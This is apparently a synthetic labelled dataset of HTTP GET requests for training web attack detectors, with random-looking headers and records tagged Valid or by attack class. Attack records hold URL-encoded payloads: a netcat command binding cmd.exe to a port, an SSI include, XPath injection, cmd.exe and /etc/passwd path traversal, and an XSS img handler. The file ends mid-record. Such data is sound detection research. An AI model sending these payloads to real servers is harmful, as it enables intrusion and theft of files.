GET /Ngytxaimhc4/y5n3loIjNUv6umQb.g3g/fnbtrt/rlO.hjkJL1KS46.html?gtellia=mkV&zTCalfctTauG=ewl5pbd3soStbbN&m0ku=ox5tohhiete0r&eoebnst=erloetdeaR&TGDeBJxedDWB=%7C+shell%28++%22cmd++++%2Fc+c%3AInetpubwwwrootMSISSnc.exe++++-l+++++-p++++6120++++-t++-e+++cmd.exe+++%22+%29+%7C+++++%27&7-perlPIncV1O_8w=lmYgolscripthorntxp_ptait&loeeaotuA5qfS=90&kxe7e8Xei=+%5Dndmrfh+3ol&too=sfromi&nhgplwe=211213&daosctinle=aMB.&i1lyu=6htpass&ss1hesni=nitcwespeeyecztar&drruertA1=aff%5C HTTP/1.0
Host: 157.126.120.30
Connection: close
Accept: text/plain, image/*;q=0.4, video/quicktime
Accept-Charset: x-mac-japanese;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=33
Client-ip: 143.230.118.47
Cookie: AChMW=6084;nt=Ctna;mRhbJNaOsdnEe=96908;soehi=;/Smuvlibhle-wp-isi;u5sxnf=0;cHnetxgeas=43
Cookie2: $Version="840"
Date: Fri, 05 Nov 04 18:35:57 UTC
ETag: W/"olCrtg5FxsS-VvM"
Expect: 100-continue
From: l6tz5hd@ruglhe.be
If-Modified-Since: Wed, 22 Oct 08 08:12:22 CET
If-Unmodified-Since: Sun, 02 Aug 09 08:17:36 CET
If-Match: "fkLSiJSki10kEDYFuWrs"
If-None-Match: *
If-Range: Wed, 11 Jun 08 01:13:43 UTC
Max-Forwards: 1448
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: njdei gtdN=st7gs
Authorization: Basic bm9kZGRzc2c6b2FiYkY=
Range: -885,-18051
Referer: /hzihf/0FsT/pommlfE/dhmeer.bin
TE: trailers,gzip;q=0.4,trailers
Trailer: Transfer-Encoding
User-Agent: eVi3-rQI9 http://www.HEtwrwji.cz
UA-CPU: Sparc
UA-Disp: 7817,3346,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 625x3364
Via: 8.4 www.edso.jpg
Transfer-Encoding: ehlbn8
Upgrade: Rhetio/0.3, d5nIg/4.3
Warning: 831 253.234.94.229 "urhmxsr8a0ucgtYcTaym" "Thu, 10 Mar 05 12:24:31 GMT"
X-Forwarded-For: 209.98.157.41
X-Serial-Number: 646833
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42851
Start - Id: 9580
class: Valid
GET /nFxvEQKg/bNiuraotreJcdyofnol/htvb3.B_XYBYTmbr/eqtObgS9/e97-4U0V/g84BUzmv.msf?pdncbm.ASVyfp=ool%40oy&sstchhs=58786266&LhZwZlhtinsertR=ceip&tgejLitagex=t1selectht%5CCkeeboent&xQneYgq50-d=eqoBezzf&euutc=wnt&ineDpan=sne HTTP/1.1
Host: www.Nctnhued.gov:80
Connection: tlbq
Accept: */*;q=0.1
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.4, compress;q=0.5, identity, deflate
Accept-Language: ltmot5-i1
Cache-Control: min-fresh=49068
Client-ip: 38.138.20.5
Cookie: egalihehslAe= =hzrrm;ayn8fxTeIk=33278311;sRkFCoVViAexec=lsnnnRoycp7
Cookie2: $Version="93"
Date: Thu, 17 Jul 08 19:54:59 GMT
ETag: W/"jNUQqj0@oyyO-EFGzPbC"
Expect: evtcn=oaftato
From: anp51@cLdyyihltw.st
If-Modified-Since: Mon, 03 Nov 08 22:31:19 UTC
If-Unmodified-Since: Thu, 01 Mar 07 12:36:38 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: r1mbr nnarE=la0imOS
Authorization: bZeo ltt6a=qeerooil
Range: 60-,-239
Referer: http://isoo.com/nSetftiE/rhAd/szfche/earIe2e.css
TE: trailers,trailers
Trailer: Host
User-Agent: Mozilla/6.4 (compatible; Konqueror/9.1; SunOS sun4u; nmaryr; rwnlloe; o3zst)
UA-CPU: 68000
UA-Disp: 932,6777,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 812x4480
Via: oEn/0.0 www.iOlneoA.css:8, HTTP/0.8 www.paasxmge.shtml
Transfer-Encoding: identity
Upgrade: aooeh/2.6
Warning: 231 19.254.39.239 "wrftls6rer98ry" "Sat, 02 May 09 14:15:54 CET"
X-Forwarded-For: 215.37.23.155
X-Serial-Number: 2426894
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9580
Start - Id: 94
class: Valid
GET /0ett5wCsllNb5naa4e/iframeAeY3QZJD2S_eval/eBdjDb5xcJH/e3n_ZsIF2CShnEMOo9.pl?uhTofwu8ReiLre=sFb7WfAV&5t7tae1hier=094&rdhhHii=a%40hi+erye%7C&7ekafiler=3935&Etnrocnecl=-iservicesei&33BcmdK2wNZ0=5393179&atRcatld=xcntthb&i9nF=%27r&Uoanh0jtaJ5c=r2oq%2Bela%5Csrfrom5forman%3D HTTP/1.0
Host: www.tHbuuaMIr.fr
Connection: egea
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-store
Client-ip: 113.43.232.139
Cookie: P6vneChRb=9665896329;RbgrRtcnuor5acs=egfi;oare=9UNBM
Cookie2: $Version="19"
Date: Sat, 25 Jul 09 05:59:45 CET
ETag: W/"_iDI58YBjNDV8n5_yr6"
Expect: d4es
From: 0aAT@medpMh.ch
If-Modified-Since: Wed, 26 Sep 07 09:36:48 CET
If-Unmodified-Since: Fri, 01 Feb 08 04:45:16 CET
If-Match: *
If-None-Match: "ShrNqM9OlrzwWQQDZ1_w"
If-Range: *
Max-Forwards: 33
MIME-Version: 9.6
Pragma: rh8imdgn='r'
Proxy-Authorization: NTLM Z1NocnRzdGN0bHluZWxycG5zZW10bmNycmN1ZWxoZ3NhY24=
Authorization: Digest uri=http://www.nroyh.be/7wrm/teeh/ifhin/85xmyr/esfhn.tar.gz
Range: 41396-563,553741-
Referer: /sciieor/luDyn/caoe9/azUcCn.jpg
TE: chunked;q=0.8
Trailer: Date
User-Agent: Mozilla/7.8 (X11; U; Solaris 4.2; i0-sg; rv:6.3.0) Gecko/92494191
UA-CPU: MIPS
UA-Disp: 156,678,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 5749x1102
Via: 8.0 99.175.90.173
Transfer-Encoding: gzip
Upgrade: aJer/9.3, w4siT/9.1
Warning: 842 199.4.175.100 "ee1nrfsC0saOb" "Tue, 12 Feb 08 10:26:21 CET"
X-Forwarded-For: 218.162.193.207
X-Serial-Number: 54044223698079
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 94
Start - Id: 40641
class: SSI
GET /vDoSRlMWQ/nd/nZJ/rf3idRx_f..qMfm1/nCnN6COOpM/e66DK9/anDsrtgeElrf7clLusi/a21m1.jWocWSa9aAxhO9/efkKA/8RgRzUTPfu/xno0rtheprsf/Ohmiabh.mdb?hwin=exim3ol&1Q.QfromvoW9=Gf5eoe%3Falh&sfriuu=n+%3Fb%24de&entp8efh=ec&fpoooreets=7a%27%3Drcp%25+iRetlafdl&nborhp=aj%5D%26ttmp-bsvbscriptrlp0da%40&5treldeheEabrt=slrcyei&tyamrrtd=hVZBXxl&nD95Ykhtffe5=sIceedyTy&Rg4jB.=071273&exc=70&oeu=19665358&imysd7dleelg04=%3C%21--++++%23include+++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+--%3E HTTP/1.1
Host: www.ediat.com
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: Yo9tIte='n'
Client-ip: 134.128.236.221
Cookie: 6thpee1nei=gKV1Ya7z;pa=r>ii0tewr;retalnaf4bn=l(/E(r4rmq=1];ewibsseauyye=]dfct(de
Cookie2: $Version="709"
Date: Tue, 29 May 07 03:17:08 CET
ETag: "-s_wqRBhPXwnF0CQ"
Expect: ejdcdc
From: tzt2Rh@qI5nosnls.cz
If-Modified-Since: Sat, 26 Dec 09 01:11:33 CET
If-Unmodified-Since: Mon, 20 Nov 06 18:00:54 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 13 Jun 07 05:26:01 UTC
Max-Forwards: 1590
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: ctauis uahpegS=thr2
Authorization: juft neyufee=gACne
Range: 026791-2
Referer: http://www.ynelhl.com/pimiRa/tuq3eit/Fysr/otbtrs/rzdE.sh
TE: trailers,trailers
Trailer: Expect
User-Agent: sDUWelld
UA-CPU: x86
UA-Disp: 959,926,32
UA-OS: WinNT
UA-Color: color16
Via: HTTP/5.2 www.peaphy.css
Transfer-Encoding: identity
Upgrade: eeyr/9.4
Warning: 799 245.96.63.176 "ln3reeOsrhu8a" 
X-Forwarded-For: 197.32.78.234
X-Serial-Number: 258483037119432010
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40641
Start - Id: 35675
class: XPathInjection
GET /WqC2Sutelnetk/eotiiqTdoegg9aebkIe8/tXN/oAA/BfCRZySKYperl/40JPwJmVn4jbPj.asmx?rroee=i4r2rt&WhQlogIxUeXHR=412665&httpstX3Ehnc=39254997&3tdr=o6%27+or+1%3C+++l%2Fhtrn%2FNumyn%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D494%5D+++or+++++%271tqdcur%27+++%3D++%27&tipmocOt=od+da&ziaTix4=z1g+&eunfiasak=sZUNbTX&be=32511&ndaIfeea=esedsNtTadmu&dlKdflsDa19anpx=oYTu5%407fme&ereerhQ3oeo3eso=pqTZGJ&msf4l0uy=0&aeae9=ela&hlc8io=00des HTTP/1.0
Host: www.3ctjhnaul.it
Connection: 8uddifie
Accept: text/xml;q=0.1, text/xml;q=0.5, text/xml
Accept-Charset: *
Accept-Encoding: 
Accept-Language: q1frns-uoagia;q=0.7
Cache-Control: max-stale
Client-ip: 68.97.141.43
Cookie: noobvtep3=h7zURB0Z;Ropmnwhsa=lnp04YSI;3yramcev=acri;wXDGDunion00=ii3d+stautoexecte;-faRIv= nr;teecjsyaol=11501
Cookie2: $Version="063"
Date: Tue, 05 Oct 04 11:41:05 UTC
ETag: "Llo6Q0Dtf73F-LBFZWsG"
Expect: e8c6tipe
From: tgaZ6rhn@dneNoaa.uk
If-Modified-Since: Wed, 05 Oct 05 16:51:04 UTC
If-Unmodified-Since: Sat, 09 Apr 05 19:47:37 GMT
If-Match: *
If-None-Match: *
If-Range: "GilEr.iMnvrxI0CF@"
Max-Forwards: 93
MIME-Version: 5.4
Pragma: Ucruem='o'
Proxy-Authorization: NTLM cnFqYVJvMHJvbzRlY25hYW5hemk5ZGFyZXRpdGV0ZnN0QXhnNW9oZWh1ZWFuaHRl
Authorization: NTLM ZWZvZWloc0E5ZWJldDExamlhc3BWZHlkaVk3Y2FvdG9zZXJHbjFlZXp3dg==
Range: -5103
Referer: http://www.tcihHc1.biz/w4rd/oyufeMyv.png
TE: chunked,trailers,deflate;q=0.4
Trailer: From
User-Agent: uao2reirhaan6rw
UA-CPU: x86
UA-Disp: 466,505,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2667x788
Via: HTTP/1.0 www.u0ty8a.jpg:87944, 7.0 www.tehyt.css:66324, FTP/3.8 www.nedt7eeS.shtml
Transfer-Encoding: o7mum
Upgrade: pnarot/3.1, 7tgym/1.5
Warning: 250 95.244.16.100 "anwrZ" 
X-Forwarded-For: 214.86.27.10
X-Serial-Number: 24734
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35675
Start - Id: 43938
class: OsCommanding
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 86.35.230.40
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: shift_jis, x-mac-icelandic;q=0.6, iso-8859-8-i, macintosh
Accept-Encoding: *;q=0.7
Accept-Language: e-maeoa, oa-VitmhDv;q=0.0, lr-e3iSP, ZeiR-Ezkaip8;q=0.9
Cache-Control: max-stale=59925
Client-ip: 203.44.173.36
Cookie: 0lTbeepccarme=68476;ubiangqa9=7982;dcoeoenicltmhox=pk=eaccess_loger5D;dxellJn0ae2seiN=5;iH=betweenTMzuenuaararrs
Cookie2: $Version="4"
Date: Sun, 16 Sep 07 11:43:11 CET
ETag: "FKkc6IzcbEuCntMpiq"
Expect: 53qdsl=8yhants;n1ncn=wiiOf
From: 1mrsvi@GkweMt.fr
If-Modified-Since: Wed, 01 Jul 09 13:22:08 CET
If-Unmodified-Since: Tue, 21 Mar 06 22:38:08 CET
If-Match: "D2.z7TCFzeJ0kUrcB7SJ"
If-None-Match: "R3yEbAaPTpfOPL2"
If-Range: Wed, 28 Apr 10 16:15:48 GMT
Max-Forwards: 918
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: enro elaaRn=qkanorol
Authorization: NTLM QWhESWxkZ3lubHNJd3l3eWhkeVJvYWFlb3JtbnBhU2FhZjJlZXp1bm5jZQ==
Range: 080946-24031
Referer: /tbehtto/iTehafde/tBtemel.html
TE: deflate;q=0.4,trailers,deflate
Trailer: If-None-Match
User-Agent: Mozilla/5.9 (Machintosh; U; Mac OS X 8.1; dt-8s; rv:7.1.4) Gecko/22088559
UA-CPU: StrongARM
UA-Disp: 9151,3536,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 428x0275
Via: HTTP/5.2 109.69.241.16, iot/1.9 62.83.26.224
Transfer-Encoding: compress
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 327 www.3eSas.css "tdlqjc" "Sat, 26 Jan 08 18:17:22 CET"
X-Forwarded-For: 206.42.220.231
X-Serial-Number: 221610848523557
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43938
Start - Id: 10105
class: Valid
GET /ssJ3Nq7V/uZaeFoiwPme/nnL/e97j1bqwRnIb_VCca/sYidKAvDxWV2S/rmovTecrwodnithl9a/om7tioeRtTheeGe/Ipp5OH/nLxJ/is/tK0tpA55@ovyZ5w.jsp?ezytdeeeau=46eutgta2tr&cehacWlofo=ed+neunaiLaccess_logoe&ay=kEonhieka6clwtmHs HTTP/1.1
Host: 80.192.177.112
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: 3cT-ervg3ao, cscr-I6bua, 6aze-8;q=0.2, 8-tr4orc
Cache-Control: no-transform
Client-ip: 125.47.27.37
Cookie: nh=h5Ja;oesoenizfscepde=kf
Cookie2: $Version="6"
Date: Mon, 08 Feb 10 10:57:03 GMT
ETag: W/"qhAFypJsMzDfSv7nCR9a"
Expect: 100-continue
From: tsbr5seo@najlknme.it
If-Modified-Since: Fri, 16 Dec 05 22:29:43 UTC
If-Unmodified-Since: Sat, 30 Aug 08 22:24:25 UTC
If-Match: "GFkLjy59-ZgE8jy2wU"
If-None-Match: "qTZCsXkaeqwud5hzap"
If-Range: "0tZNZe1UBscGR-Hrcvni"
Max-Forwards: 71
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Basic d2lia25yczpzNnR0
Authorization: Digest nc=0eb7378d
Range: -4,998277-
Referer: http://3Xli.uk/tTtol/qker/tamssrgn/rispat1/tsl4o6.jsp
TE: deflate
Trailer: If-Match
User-Agent: Mozilla/1.8 (Machintosh; U; PPC Mac OS X 5.7; hs-qc; rv:1.3.6) Gecko/17795747
UA-CPU: x86
UA-Disp: 886,964,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 9723x8891
Via: HTTP/6.7 111.67.200.23
Transfer-Encoding: deflate
Upgrade: Nraco/5.1, 3tms/3.4
Warning: 301 www.Ipmhyt.jpeg "eqieennEenOi6nv" 
X-Forwarded-For: 219.87.157.60
X-Serial-Number: 70224009
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10105
Start - Id: 12604
class: Valid
GET /11ctptn6ffa7tEmn/eT4i5r1-/tuzppuabady47ueneEsn/oWZyC01uJ50IHo/bXl/bteee/cWV_iG6dwLJiWTLy7/lKC@mP/an@zhcPQRzJ4g/jo/fe2kIsni1ZmsTp.php?jso9wrerbrnw=0&0HzVmnhAgdx71e=ac1&eh=nI3MO0b&1PV@OhQ=t5lnoegMeasido&iytpaciiolsoo=oJd.cJEWRZmP&eshNinamstrased=aOUi1kV&ahrseae=608&nku1r=cYQ7AK5aj0 HTTP/1.1
Host: www.Lbpane.com
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: gzip, gzip;q=0.5, identity, deflate, compress;q=0.6
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 139.134.8.81
Cookie: nnvsnt=eXky2uDQ@;ui9othwa1oe8wIO=5giwrmIulo;cgtsnz7=Oirul;1dTesryP=vti;vdsden2da=rCOsM
Cookie2: $Version="5"
Date: Tue, 12 Jun 07 15:03:18 CET
ETag: W/"JhUqncjLNpQbq8uSR"
Expect: aticmne0
From: twlt2b@loijwag.it
If-Modified-Since: Tue, 17 Oct 06 06:13:14 GMT
If-Unmodified-Since: Mon, 15 May 06 08:10:02 UTC
If-Match: "GpJg_fbs.n9hlbd9DHf"
If-None-Match: *
If-Range: Sat, 12 Nov 05 02:41:42 GMT
Max-Forwards: 46
MIME-Version: 1.8
Pragma: 3='i4'
Proxy-Authorization: Digest realm
Authorization: Digest algorithm=MD5
Range: 6-190
Referer: http://www.n6D6Rg.ch/4sue/drog/oynenorh/1tou7/yejDh8ts.asmx
TE: gzip,trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/9.7 (compatible; Konqueror/4.4; Unix; nh7est; matusaho; etcQa3rodt)
UA-CPU: x86
UA-Disp: 3446,218,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 280x609
Via: FTP/5.0 www.etogis.html:42717, HTTP/5.2 www.vteqahio.shtml, FTP/0.7 249.213.253.186
Transfer-Encoding: deflate
Upgrade: 3n9/9.5, ido/8.7, mo5iss/2.2
Warning: 763 www.z7ul.css "tssrit" "Wed, 27 Feb 08 20:20:42 CET"
X-Forwarded-For: 75.184.77.165
X-Serial-Number: 3726535305604
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12604
Start - Id: 46192
class: PathTransversal
GET /oy.x_xj09D@T-20rC/siseUnudo1/ymMBS2sp.sh?ctozd9rlgwf=9099&rItaqh=..%2F..%2F..%2F..%2Fvar%2Flog%2Faccess_log%2500.html&omiWmhlsihu=rv&8eHrtt=1VHDW&eehssaptl=297975&9tccon=oFznFTcO2&@uELG_FNA=tesonotwracntpnteo&i8soi=esgroa&t9esibnosschdh=3221&iAwO=10 HTTP/1.1
Host: 104.16.16.215
Connection: keep-alive
Accept: image/*;q=0.9, image/gif
Accept-Charset: shift_jis;q=0.4, koi8-r;q=0.9
Accept-Encoding: compress, gzip;q=0.5, gzip, compress;q=0.9
Accept-Language: dWBnthsr-3i;q=0.1, 2a-isa;q=0.6, pobfntFh-g3dga, euer-ruiat
Cache-Control: einwcdh=Rgru
Client-ip: 158.116.5.64
Cookie: 3xmldC3uDyQUi2=0132598;Qa1stdinJXgboot.iniH=48662
Cookie2: $Version="17"
Date: Fri, 02 Feb 07 21:40:42 UTC
ETag: "PIOKd41SFB0k-N5Ua1g"
Expect: xcdqeus=aitrtthe;gkdhcus
From: sloo@sd406oko.ch
If-Modified-Since: Fri, 29 Aug 08 18:03:03 UTC
If-Unmodified-Since: Sat, 28 Jan 06 12:20:51 GMT
If-Match: "pv2eHXEXrNBXFRj1Szr"
If-None-Match: "W4vw3vRiT3Jk16qthh"
If-Range: "-Rj9Lq3GxzlX@C-3r-"
Max-Forwards: 08
MIME-Version: 2.5
Pragma: 3e=xsS
Proxy-Authorization: Basic Z2Q2bmVlOmFsaWd0aA==
Authorization: g4eet lfeuzoi7=eeeeogin
Range: -97,23050-0106,32363-54
Referer: /ondR/eLmohoaa/eet8tdu/Moett8.swf
TE: trailers,chunked;q=0.4
Trailer: Accept-Language
User-Agent: oesin1pE
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 939x7286
Via: HTTP/3.9 253.157.170.106, 3.8 www.np1tf4u9.htm:6310
Transfer-Encoding: gzip
Upgrade: eesinn/1.0, mc0b/6.6, eaa9an/7.8, olCrho/0.4, dhbfna/5.5
Warning: 885 150.132.83.196:7 "UN6M8draouta3nienwag" 
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 4158799
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46192
Start - Id: 47343
class: XSS
GET /bIasTtrnixG/86csaCpodqfcumarosis/hry/fdoObemtSsnooo4snN/yhChpdivbgsound/wdphgccicjuiqDrbr9/jfgi4f/ta1G6QZH3RQlf3K/u5rUZgvU5qC5EwJhqiDA/heGj4Klrd/lYQnKcekYeF/96latt9o2y1.css?gxsEyowawsn7er=49581221&EnafmTn3t=gmgas&a8=vsN6%29&aS3tt=%3Cimg+++++src++%3D%22+++to++++%22onmouseover++%3D++++%22++%5Balert++++%28%27r8tait%27%29%3B%5D+++++%22%3E&waedaelohiNt6no=400573626&aahianEoyo7d=koC&jaurri2Tt=+q5tH&siSnet=3093&etarnndubofd7r=2758&txdabcoz=80&GmEllntmbc=18&ADpM1mqM6Um9=ie&hiincludernullhavingY=6 HTTP/1.1
Host: 21.104.143.86:213
Connection: Uiyt6tu
Accept: image/*, video/mpeg;q=0.3, image/*
Accept-Charset: x-mac-arabic;q=0.8, iso-10646-ucs-2;q=0.0, iso-8859-5
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 108.182.85.89
Cookie: neofs5arimtno=lsanybtsjeth;tsemimz=u5Naat]de8ehwfw[;x0F.S=sf(ni[;ijertnqARdxa=eydteNvpotr;ahlne=[wig
Cookie2: $Version="38"
Date: Tue, 13 Dec 05 07:39:23 UTC
ETag: W/"@ohBoT1s.JGyaGLB2"
Expect: 100-continue
From: Ecnsai@ss9aup.gov
If-Modified-Since: Sun, 04 May 08 22:32:47 GMT
If-Unmodified-Since: Fri, 02 Sep 05 03:03:40 GMT
If-Match: "4SUILGc06mQVxz@"
If-None-Match: "H.7ieAko@6GK25PU_Sca"
If-Range: *
Max-Forwards: 2956
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: Basic cmlvYlNhZVg6bm1kbW1saQ==
Range: -066761,152-
Referer: http://www.nmto.ch/TE6e.zip
TE: trailers,trailers,deflate
Trailer: If-Match
User-Agent: r8deqin (raGSNS-WLU; mvrD1cWq0; tm9O_Lcta9; eNsjv2tdi)
UA-CPU: MIPS
UA-Disp: 699,6656,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 575x5791
Via: FTP/5.9 176.31.159.123:6
Transfer-Encoding: identity
Upgrade: eoea/3.2, whp5n/5.7, nto/1.7, nsa/0.9
Warning: 030 32.43.121.212 "zsmp" 
X-Forwarded-For: 216.123.220.178
X-Serial-Number: 0450626600564347
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47343
Start - Id: 49935
class: XPathInjection
GET /Lj/a8h3gsInhgAceb/ieSbltn5nto8msnlfis/osgbQQZ0Z/rtoNzeTera/0uimctstwes1at/ia2rniianeaz0/oeogbBgupeeyrioe/iTdeqIeKoE/WXn.Rlmeta/sd.js?oUrnniE=4h%2Bfhoidaoj7s&eeuaot=yqf&pheyrPlfn=s%29fconnectt&moe=%28i++++%3C+++++count%28irw%2Fchild%3A%3Atext%28%29%29+++++and+++j++++%3C+++++count%28suk%2Fchild%3A%3Acomment%28%29%29+++++and++k++++%3C++++count%28bhenti%2Fchild%3A%3A*%29+++++%29&owaromto=troO&i9regNeehdYWat=e7Iwhoup2Eeb HTTP/1.0
Host: 192.109.194.169:0733
Connection: yll6lx
Accept: image/jpeg;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: w-ecnsmsc6, n0d-uietmPn;q=0.2
Cache-Control: only-if-cached
Client-ip: 69.149.110.120
Cookie: Zv3u=cVv6Cq_C9NJ2;ndseloehnNPs=Ltnjo7nr( 
Cookie2: $Version="5"
Date: Mon, 14 Aug 06 16:12:59 GMT
ETag: W/"i-WIg.Pxydq@40bwD"
Expect: 100-continue
From: cbithw@teurCy.cz
If-Modified-Since: Sun, 25 May 08 17:28:06 UTC
If-Unmodified-Since: Wed, 29 Dec 04 15:56:13 CET
If-Match: *
If-None-Match: "muZqlDxp0r9@lt5VLUp"
If-Range: Fri, 27 Jun 08 09:01:00 CET
Max-Forwards: 428
MIME-Version: 7.1
Pragma: hcho=wlaaNEra
Proxy-Authorization: Digest nonce
Authorization: 3gee mg6nr=ghqssso
Range: -821,817-,-8
Referer: /eTNaj/EstaMs/mvyt/td8ecu.msf
TE: trailers,trailers
Trailer: Via
User-Agent: Mozilla/5.7 (compatible; MSIE 9.3; Windows NT; yrta6; toanAb; iobJlam)
UA-CPU: x86
UA-Disp: 3308,0110,8
UA-OS: Windows 95
UA-Pixels: 299x2707
Via: 0.5 www.uDretah4.css:36993, 1.1 www.45Taltn.jpeg:00787
Transfer-Encoding: gzip
Upgrade: oepjtw/9.0, eribt/2.4, enN/6.1
Warning: 456 243.193.239.132 "aIeI4en5" "Fri, 30 Mar 07 09:51:48 CET"
X-Forwarded-For: 174.45.94.7
X-Serial-Number: 84157643689
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49935
Start - Id: 8654
class: Valid
GET /updateHB7SqbFAC/oe3alrhxroonyilRl.swf?4caec9ir=scagnRile&eth19onyinsaNrk=10817&8rFlftophsa=k&kt3toc=r4LIdqqg8zf&TAlgtsccAcwct=230537&4rhea2h=boot.iniselectltiaoseir&osurKszose=erh&myrtilhftohkntp=50&mu89mieoadt=dgcoY&eahIpfueSnc=taisIE0t8smLmeg HTTP/1.0
Host: 206.107.211.195
Connection: wgltte
Accept: */*
Accept-Charset: cp-932
Accept-Encoding: deflate;q=0.8, compress, gzip
Accept-Language: A-a;q=0.1, dOamrprq-g9apt, aFAe-e8, i8toh-eeatsl;q=0.0
Cache-Control: tl='tr'
Client-ip: 177.129.186.148
Cookie: Smt=pARFdln;IN0dE3YKtmpvbscriptin.=54;nbuoiiso= b;YaLaSisai=843489584
Cookie2: $Version="3"
Date: Wed, 25 Mar 09 03:09:58 CET
ETag: "8vrFUpBbSL_gbSY"
Expect: 100-continue
From: iqTi@9hcauaorqk.fr
If-Modified-Since: Fri, 11 Jan 08 11:32:27 UTC
If-Unmodified-Since: Fri, 24 Feb 06 17:20:48 CET
If-Match: *
If-None-Match: "dIlZ5l701fB8pjD"
If-Range: Sun, 01 Feb 09 03:05:45 GMT
Max-Forwards: 5692
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Digest nc=ADd2Cfd8
Authorization: Uwdre aehanso=tetaMp
Range: -766,58-986789
Referer: /apeofd.txt
TE: trailers,deflate;q=0.7,chunked;q=0.9
Trailer: Host
User-Agent: uts0cerf (2B1cXQ.xc)
UA-CPU: 68000
UA-Disp: 051,717,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8393x485
Via: 6.3 www.fmnrM.jpeg, 0.0 www.0mSPlmfl.tiff
Transfer-Encoding: deflate
Upgrade: tul6nr/8.0, k5roha/7.1, edhia/4.1, tben/5.7
Warning: 888 www.beiaIt.css "S3j3Xr4oawsaaadt" "Mon, 27 Aug 07 01:27:20 GMT"
X-Forwarded-For: 71.14.68.150
X-Serial-Number: 396730650206
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 8654
Start - Id: 46355
class: PathTransversal
GET /rW9TP1Dj1BXzXZJ@M_/e9.mQi0uMP914ykiE/ctUpsoeuaohmfiSed/tj9E9285YWW6gNqiR/sz/rshyesk7estO.nsf?o8mycgOeroe6D=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html HTTP/1.0
Host: 130.63.154.208:80
Connection: eteom
Accept: */*
Accept-Charset: iso-8859-15, windows-1252;q=0.3, iso-8859-2, iso-8859-5;q=0.4
Accept-Encoding: 
Accept-Language: rrah-sedexsI, ohOn-nrw2q;q=0.2, usp-A9;q=0.7
Cache-Control: only-if-cached
Client-ip: 18.204.111.125
Cookie: clnhsdjcqons1rj=in1uD5;Z-6P=inandhuhvbm)meme;mrlsevs=[:~sPjins)Ptta
Cookie2: $Version="19"
Date: Sun, 02 May 04 20:02:52 GMT
ETag: W/"iS.lsM4a5lrac@V_Cu"
Expect: esadlihc=tu29hp
From: dB62@isuoongs1.org
If-Modified-Since: Thu, 18 Sep 08 06:21:34 CET
If-Unmodified-Since: Sun, 10 Feb 08 14:41:51 GMT
If-Match: "6qPo_nZ9NNVBUL38"
If-None-Match: "EAB07Nr8pG9SZWNoW"
If-Range: *
Max-Forwards: 3115
MIME-Version: 1.9
Pragma: tN='Iion'
